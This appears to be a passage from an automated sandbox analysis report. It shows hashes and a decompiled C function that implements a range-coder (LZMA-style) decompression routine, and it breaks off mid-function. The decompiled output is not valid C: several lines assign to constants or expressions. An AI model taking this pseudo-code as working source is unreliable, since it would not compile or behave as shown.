                      • Opcode ID: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                      • Instruction ID: bb8ed6064adbc6ac752208bd1780db284a58169b415d1e5229999a4f541ad509
                      • Opcode Fuzzy Hash: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                      • Instruction Fuzzy Hash: 11912271D00229CBDF28CF98C854BADBBB1FB44305F15816AD816BB291C7789A96DF44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E00406398() {
                      				unsigned short _t532;
                      				signed int _t533;
                      				void _t534;
                      				void* _t535;
                      				signed int _t536;
                      				signed int _t565;
                      				signed int _t568;
                      				signed int _t589;
                      				signed int* _t606;
                      				void* _t613;
                      
                      				L0:
                      				while(1) {
                      					L0:
                      					if( *(_t613 - 0x40) != 0) {
                      						L89:
                      						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                      						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                      						L69:
                      						_t606 =  *(_t613 - 0x58);
                      						 *(_t613 - 0x84) = 0x12;
                      						L132:
                      						 *(_t613 - 0x54) = _t606;
                      						L133:
                      						_t532 =  *_t606;
                      						_t589 = _t532 & 0x0000ffff;
                      						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                      						if( *(_t613 - 0xc) >= _t565) {
                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                      							 *(_t613 - 0x40) = 1;
                      							_t533 = _t532 - (_t532 >> 5);
                      							 *_t606 = _t533;
                      						} else {
                      							 *(_t613 - 0x10) = _t565;
                      							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                      							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                      						}
                      						if( *(_t613 - 0x10) >= 0x1000000) {
                      							L139:
                      							_t534 =  *(_t613 - 0x84);
                      							L140:
                      							 *(_t613 - 0x88) = _t534;
                      							goto L1;
                      						} else {
                      							L137:
                      							if( *(_t613 - 0x6c) == 0) {
                      								 *(_t613 - 0x88) = 5;
                      								goto L170;
                      							}
                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                      							goto L139;
                      						}
                      					} else {
                      						if( *(__ebp - 0x60) == 0) {
                      							L171:
                      							_t536 = _t535 | 0xffffffff;
                      							L172:
                      							return _t536;
                      						}
                      						__eax = 0;
                      						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                      						0 | _t258 = _t258 + _t258 + 9;
                      						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                      						L75:
                      						if( *(__ebp - 0x64) == 0) {
                      							 *(__ebp - 0x88) = 0x1b;
                      							L170:
                      							_t568 = 0x22;
                      							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                      							_t536 = 0;
                      							goto L172;
                      						}
                      						__eax =  *(__ebp - 0x14);
                      						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      						if(__eax >=  *(__ebp - 0x74)) {
                      							__eax = __eax +  *(__ebp - 0x74);
                      						}
                      						__edx =  *(__ebp - 8);
                      						__cl =  *(__eax + __edx);
                      						__eax =  *(__ebp - 0x14);
                      						 *(__ebp - 0x5c) = __cl;
                      						 *(__eax + __edx) = __cl;
                      						__eax = __eax + 1;
                      						__edx = 0;
                      						_t274 = __eax %  *(__ebp - 0x74);
                      						__eax = __eax /  *(__ebp - 0x74);
                      						__edx = _t274;
                      						__eax =  *(__ebp - 0x68);
                      						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      						_t283 = __ebp - 0x64;
                      						 *_t283 =  *(__ebp - 0x64) - 1;
                      						 *( *(__ebp - 0x68)) = __cl;
                      						L79:
                      						 *(__ebp - 0x14) = __edx;
                      						L80:
                      						 *(__ebp - 0x88) = 2;
                      					}
                      					L1:
                      					_t535 =  *(_t613 - 0x88);
                      					if(_t535 > 0x1c) {
                      						goto L171;
                      					}
                      					switch( *((intOrPtr*)(_t535 * 4 +  &M004068EF))) {
                      						case 0:
                      							if( *(_t613 - 0x6c) == 0) {
                      								goto L170;
                      							}
                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      							_t535 =  *( *(_t613 - 0x70));
                      							if(_t535 > 0xe1) {
                      								goto L171;
                      							}
                      							_t539 = _t535 & 0x000000ff;
                      							_push(0x2d);
                      							asm("cdq");
                      							_pop(_t570);
                      							_push(9);
                      							_pop(_t571);
                      							_t609 = _t539 / _t570;
                      							_t541 = _t539 % _t570 & 0x000000ff;
                      							asm("cdq");
                      							_t604 = _t541 % _t571 & 0x000000ff;
                      							 *(_t613 - 0x3c) = _t604;
                      							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                      							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                      							_t612 = (0x300 << _t604 + _t609) + 0x736;
                      							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                      								L10:
                      								if(_t612 == 0) {
                      									L12:
                      									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                      									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                      									goto L15;
                      								} else {
                      									goto L11;
                      								}
                      								do {
                      									L11:
                      									_t612 = _t612 - 1;
                      									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                      								} while (_t612 != 0);
                      								goto L12;
                      							}
                      							if( *(_t613 - 4) != 0) {
                      								GlobalFree( *(_t613 - 4));
                      							}
                      							_t535 = GlobalAlloc(0x40, 0x600); // executed
                      							 *(_t613 - 4) = _t535;
                      							if(_t535 == 0) {
                      								goto L171;
                      							} else {
                      								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                      								goto L10;
                      							}
                      						case 1:
                      							L13:
                      							__eflags =  *(_t613 - 0x6c);
                      							if( *(_t613 - 0x6c) == 0) {
                      								 *(_t613 - 0x88) = 1;
                      								goto L170;
                      							}
                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      							_t45 = _t613 - 0x48;
                      							 *_t45 =  *(_t613 - 0x48) + 1;
                      							__eflags =  *_t45;
                      							L15:
                      							if( *(_t613 - 0x48) < 4) {
                      								goto L13;
                      							}
                      							_t547 =  *(_t613 - 0x40);
                      							if(_t547 ==  *(_t613 - 0x74)) {
                      								L20:
                      								 *(_t613 - 0x48) = 5;
                      								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                      								goto L23;
                      							}
                      							 *(_t613 - 0x74) = _t547;
                      							if( *(_t613 - 8) != 0) {
                      								GlobalFree( *(_t613 - 8));
                      							}
                      							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                      							 *(_t613 - 8) = _t535;
                      							if(_t535 == 0) {
                      								goto L171;
                      							} else {
                      								goto L20;
                      							}
                      						case 2:
                      							L24:
                      							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                      							 *(_t613 - 0x84) = 6;
                      							 *(_t613 - 0x4c) = _t554;
                      							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                      							goto L132;
                      						case 3:
                      							L21:
                      							__eflags =  *(_t613 - 0x6c);
                      							if( *(_t613 - 0x6c) == 0) {
                      								 *(_t613 - 0x88) = 3;
                      								goto L170;
                      							}
                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      							_t67 = _t613 - 0x70;
                      							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                      							__eflags =  *_t67;
                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                      							L23:
                      							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                      							if( *(_t613 - 0x48) != 0) {
                      								goto L21;
                      							}
                      							goto L24;
                      						case 4:
                      							goto L133;
                      						case 5:
                      							goto L137;
                      						case 6:
                      							__edx = 0;
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__eax =  *(__ebp - 4);
                      								__ecx =  *(__ebp - 0x38);
                      								 *(__ebp - 0x34) = 1;
                      								 *(__ebp - 0x84) = 7;
                      								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                      								goto L132;
                      							}
                      							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                      							__esi =  *(__ebp - 0x60);
                      							__cl = 8;
                      							__cl = 8 -  *(__ebp - 0x3c);
                      							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                      							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                      							__ecx =  *(__ebp - 0x3c);
                      							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                      							__ecx =  *(__ebp - 4);
                      							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                      							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                      							__eflags =  *(__ebp - 0x38) - 4;
                      							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      							if( *(__ebp - 0x38) >= 4) {
                      								__eflags =  *(__ebp - 0x38) - 0xa;
                      								if( *(__ebp - 0x38) >= 0xa) {
                      									_t98 = __ebp - 0x38;
                      									 *_t98 =  *(__ebp - 0x38) - 6;
                      									__eflags =  *_t98;
                      								} else {
                      									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                      								}
                      							} else {
                      								 *(__ebp - 0x38) = 0;
                      							}
                      							__eflags =  *(__ebp - 0x34) - __edx;
                      							if( *(__ebp - 0x34) == __edx) {
                      								__ebx = 0;
                      								__ebx = 1;
                      								goto L61;
                      							} else {
                      								__eax =  *(__ebp - 0x14);
                      								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      								__eflags = __eax -  *(__ebp - 0x74);
                      								if(__eax >=  *(__ebp - 0x74)) {
                      									__eax = __eax +  *(__ebp - 0x74);
                      									__eflags = __eax;
                      								}
                      								__ecx =  *(__ebp - 8);
                      								__ebx = 0;
                      								__ebx = 1;
                      								__al =  *((intOrPtr*)(__eax + __ecx));
                      								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                      								goto L41;
                      							}
                      						case 7:
                      							__eflags =  *(__ebp - 0x40) - 1;
                      							if( *(__ebp - 0x40) != 1) {
                      								__eax =  *(__ebp - 0x24);
                      								 *(__ebp - 0x80) = 0x16;
                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      								__eax =  *(__ebp - 0x28);
                      								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      								__eax =  *(__ebp - 0x2c);
                      								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      								__eax = 0;
                      								__eflags =  *(__ebp - 0x38) - 7;
                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      								__al = __al & 0x000000fd;
                      								__eax = (__eflags >= 0) - 1 + 0xa;
                      								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                      								__eax =  *(__ebp - 4);
                      								__eax =  *(__ebp - 4) + 0x664;
                      								__eflags = __eax;
                      								 *(__ebp - 0x58) = __eax;
                      								goto L69;
                      							}
                      							__eax =  *(__ebp - 4);
                      							__ecx =  *(__ebp - 0x38);
                      							 *(__ebp - 0x84) = 8;
                      							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                      							goto L132;
                      						case 8:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__eax =  *(__ebp - 4);
                      								__ecx =  *(__ebp - 0x38);
                      								 *(__ebp - 0x84) = 0xa;
                      								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                      							} else {
                      								__eax =  *(__ebp - 0x38);
                      								__ecx =  *(__ebp - 4);
                      								__eax =  *(__ebp - 0x38) + 0xf;
                      								 *(__ebp - 0x84) = 9;
                      								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                      								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                      							}
                      							goto L132;
                      						case 9:
                      							goto L0;
                      						case 0xa:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__eax =  *(__ebp - 4);
                      								__ecx =  *(__ebp - 0x38);
                      								 *(__ebp - 0x84) = 0xb;
                      								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                      								goto L132;
                      							}
                      							__eax =  *(__ebp - 0x28);
                      							goto L88;
                      						case 0xb:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__ecx =  *(__ebp - 0x24);
                      								__eax =  *(__ebp - 0x20);
                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      							} else {
                      								__eax =  *(__ebp - 0x24);
                      							}
                      							__ecx =  *(__ebp - 0x28);
                      							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      							L88:
                      							__ecx =  *(__ebp - 0x2c);
                      							 *(__ebp - 0x2c) = __eax;
                      							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      							goto L89;
                      						case 0xc:
                      							L99:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0xc;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t334 = __ebp - 0x70;
                      							 *_t334 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t334;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							__eax =  *(__ebp - 0x2c);
                      							goto L101;
                      						case 0xd:
                      							L37:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0xd;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t122 = __ebp - 0x70;
                      							 *_t122 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t122;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							L39:
                      							__eax =  *(__ebp - 0x40);
                      							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                      								goto L48;
                      							}
                      							__eflags = __ebx - 0x100;
                      							if(__ebx >= 0x100) {
                      								goto L54;
                      							}
                      							L41:
                      							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                      							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                      							__ecx =  *(__ebp - 0x58);
                      							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                      							 *(__ebp - 0x48) = __eax;
                      							__eax = __eax + 1;
                      							__eax = __eax << 8;
                      							__eax = __eax + __ebx;
                      							__esi =  *(__ebp - 0x58) + __eax * 2;
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      							__ax =  *__esi;
                      							 *(__ebp - 0x54) = __esi;
                      							__edx = __ax & 0x0000ffff;
                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                      							__eflags =  *(__ebp - 0xc) - __ecx;
                      							if( *(__ebp - 0xc) >= __ecx) {
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      								__cx = __ax;
                      								 *(__ebp - 0x40) = 1;
                      								__cx = __ax >> 5;
                      								__eflags = __eax;
                      								__ebx = __ebx + __ebx + 1;
                      								 *__esi = __ax;
                      							} else {
                      								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                      								 *(__ebp - 0x10) = __ecx;
                      								0x800 = 0x800 - __edx;
                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                      								__ebx = __ebx + __ebx;
                      								 *__esi = __cx;
                      							}
                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                      							 *(__ebp - 0x44) = __ebx;
                      							if( *(__ebp - 0x10) >= 0x1000000) {
                      								goto L39;
                      							} else {
                      								goto L37;
                      							}
                      						case 0xe:
                      							L46:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0xe;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t156 = __ebp - 0x70;
                      							 *_t156 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t156;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							while(1) {
                      								L48:
                      								__eflags = __ebx - 0x100;
                      								if(__ebx >= 0x100) {
                      									break;
                      								}
                      								__eax =  *(__ebp - 0x58);
                      								__edx = __ebx + __ebx;
                      								__ecx =  *(__ebp - 0x10);
                      								__esi = __edx + __eax;
                      								__ecx =  *(__ebp - 0x10) >> 0xb;
                      								__ax =  *__esi;
                      								 *(__ebp - 0x54) = __esi;
                      								__edi = __ax & 0x0000ffff;
                      								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      								__eflags =  *(__ebp - 0xc) - __ecx;
                      								if( *(__ebp - 0xc) >= __ecx) {
                      									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      									__cx = __ax;
                      									_t170 = __edx + 1; // 0x1
                      									__ebx = _t170;
                      									__cx = __ax >> 5;
                      									__eflags = __eax;
                      									 *__esi = __ax;
                      								} else {
                      									 *(__ebp - 0x10) = __ecx;
                      									0x800 = 0x800 - __edi;
                      									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      									__ebx = __ebx + __ebx;
                      									 *__esi = __cx;
                      								}
                      								__eflags =  *(__ebp - 0x10) - 0x1000000;
                      								 *(__ebp - 0x44) = __ebx;
                      								if( *(__ebp - 0x10) >= 0x1000000) {
                      									continue;
                      								} else {
                      									goto L46;
                      								}
                      							}
                      							L54:
                      							_t173 = __ebp - 0x34;
                      							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                      							__eflags =  *_t173;
                      							goto L55;
                      						case 0xf:
                      							L58:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0xf;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t203 = __ebp - 0x70;
                      							 *_t203 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t203;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							L60:
                      							__eflags = __ebx - 0x100;
                      							if(__ebx >= 0x100) {
                      								L55:
                      								__al =  *(__ebp - 0x44);
                      								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                      								goto L56;
                      							}
                      							L61:
                      							__eax =  *(__ebp - 0x58);
                      							__edx = __ebx + __ebx;
                      							__ecx =  *(__ebp - 0x10);
                      							__esi = __edx + __eax;
                      							__ecx =  *(__ebp - 0x10) >> 0xb;
                      							__ax =  *__esi;
                      							 *(__ebp - 0x54) = __esi;
                      							__edi = __ax & 0x0000ffff;
                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      							__eflags =  *(__ebp - 0xc) - __ecx;
                      							if( *(__ebp - 0xc) >= __ecx) {
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      								__cx = __ax;
                      								_t217 = __edx + 1; // 0x1
                      								__ebx = _t217;
                      								__cx = __ax >> 5;
                      								__eflags = __eax;
                      								 *__esi = __ax;
                      							} else {
                      								 *(__ebp - 0x10) = __ecx;
                      								0x800 = 0x800 - __edi;
                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      								__ebx = __ebx + __ebx;
                      								 *__esi = __cx;
                      							}
                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                      							 *(__ebp - 0x44) = __ebx;
                      							if( *(__ebp - 0x10) >= 0x1000000) {
                      								goto L60;
                      							} else {
                      								goto L58;
                      							}
                      						case 0x10:
                      							L109:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0x10;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t365 = __ebp - 0x70;
                      							 *_t365 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t365;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							goto L111;
                      						case 0x11:
                      							goto L69;
                      						case 0x12:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__eax =  *(__ebp - 0x58);
                      								 *(__ebp - 0x84) = 0x13;
                      								__esi =  *(__ebp - 0x58) + 2;
                      								goto L132;
                      							}
                      							__eax =  *(__ebp - 0x4c);
                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                      							__ecx =  *(__ebp - 0x58);
                      							__eax =  *(__ebp - 0x4c) << 4;
                      							__eflags = __eax;
                      							__eax =  *(__ebp - 0x58) + __eax + 4;
                      							goto L130;
                      						case 0x13:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								_t469 = __ebp - 0x58;
                      								 *_t469 =  *(__ebp - 0x58) + 0x204;
                      								__eflags =  *_t469;
                      								 *(__ebp - 0x30) = 0x10;
                      								 *(__ebp - 0x40) = 8;
                      								L144:
                      								 *(__ebp - 0x7c) = 0x14;
                      								goto L145;
                      							}
                      							__eax =  *(__ebp - 0x4c);
                      							__ecx =  *(__ebp - 0x58);
                      							__eax =  *(__ebp - 0x4c) << 4;
                      							 *(__ebp - 0x30) = 8;
                      							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                      							L130:
                      							 *(__ebp - 0x58) = __eax;
                      							 *(__ebp - 0x40) = 3;
                      							goto L144;
                      						case 0x14:
                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                      							__eax =  *(__ebp - 0x80);
                      							goto L140;
                      						case 0x15:
                      							__eax = 0;
                      							__eflags =  *(__ebp - 0x38) - 7;
                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      							__al = __al & 0x000000fd;
                      							__eax = (__eflags >= 0) - 1 + 0xb;
                      							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                      							goto L120;
                      						case 0x16:
                      							__eax =  *(__ebp - 0x30);
                      							__eflags = __eax - 4;
                      							if(__eax >= 4) {
                      								_push(3);
                      								_pop(__eax);
                      							}
                      							__ecx =  *(__ebp - 4);
                      							 *(__ebp - 0x40) = 6;
                      							__eax = __eax << 7;
                      							 *(__ebp - 0x7c) = 0x19;
                      							 *(__ebp - 0x58) = __eax;
                      							goto L145;
                      						case 0x17:
                      							L145:
                      							__eax =  *(__ebp - 0x40);
                      							 *(__ebp - 0x50) = 1;
                      							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                      							goto L149;
                      						case 0x18:
                      							L146:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0x18;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t484 = __ebp - 0x70;
                      							 *_t484 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t484;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							L148:
                      							_t487 = __ebp - 0x48;
                      							 *_t487 =  *(__ebp - 0x48) - 1;
                      							__eflags =  *_t487;
                      							L149:
                      							__eflags =  *(__ebp - 0x48);
                      							if( *(__ebp - 0x48) <= 0) {
                      								__ecx =  *(__ebp - 0x40);
                      								__ebx =  *(__ebp - 0x50);
                      								0 = 1;
                      								__eax = 1 << __cl;
                      								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                      								__eax =  *(__ebp - 0x7c);
                      								 *(__ebp - 0x44) = __ebx;
                      								goto L140;
                      							}
                      							__eax =  *(__ebp - 0x50);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      							__eax =  *(__ebp - 0x58);
                      							__esi = __edx + __eax;
                      							 *(__ebp - 0x54) = __esi;
                      							__ax =  *__esi;
                      							__edi = __ax & 0x0000ffff;
                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      							__eflags =  *(__ebp - 0xc) - __ecx;
                      							if( *(__ebp - 0xc) >= __ecx) {
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      								__cx = __ax;
                      								__cx = __ax >> 5;
                      								__eax = __eax - __ecx;
                      								__edx = __edx + 1;
                      								__eflags = __edx;
                      								 *__esi = __ax;
                      								 *(__ebp - 0x50) = __edx;
                      							} else {
